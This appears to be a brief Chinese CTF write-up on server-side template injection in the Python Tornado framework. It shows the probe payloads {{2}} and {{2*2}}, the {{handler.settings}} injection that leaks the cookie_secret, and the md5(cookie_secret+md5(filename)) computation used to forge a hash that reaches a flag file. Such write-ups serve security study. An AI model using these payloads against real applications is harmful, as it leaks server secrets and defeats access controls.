SSTI之python-Tornado

一.知识

1.cookie_secret在哪

cookie_secret
Tornado框架的附属文件handler.settings中存在cookie_secret

二.实例

1.cookie_secret,md5加密(通常解密失败)

(1)

{{2}}

{{2}}就可以得到回显，说明此处是可能存在SSTI注入漏洞的。

(2)

{{2*2}}

回显的结果是orz。因此我们可以猜测出，此处是出现了过滤。

(3)

{{handler.settings}}

得到cookie_secret:

f9f659d4-8993-4035-afd4-7d2dbbec2d3a

(4)
md5(cookie_secret+md5(/fllllllllllllag))
/fllllllllllllag通过md5加密后：

3bf9f6cf685a6dd8defadabfb41a03a1

**md5(cookie_secret+md5(/fllllllllllllag))**通过md5加密后的结果:

1f461696eb5c63fa069a126ec125d7ff（变化中，不一样）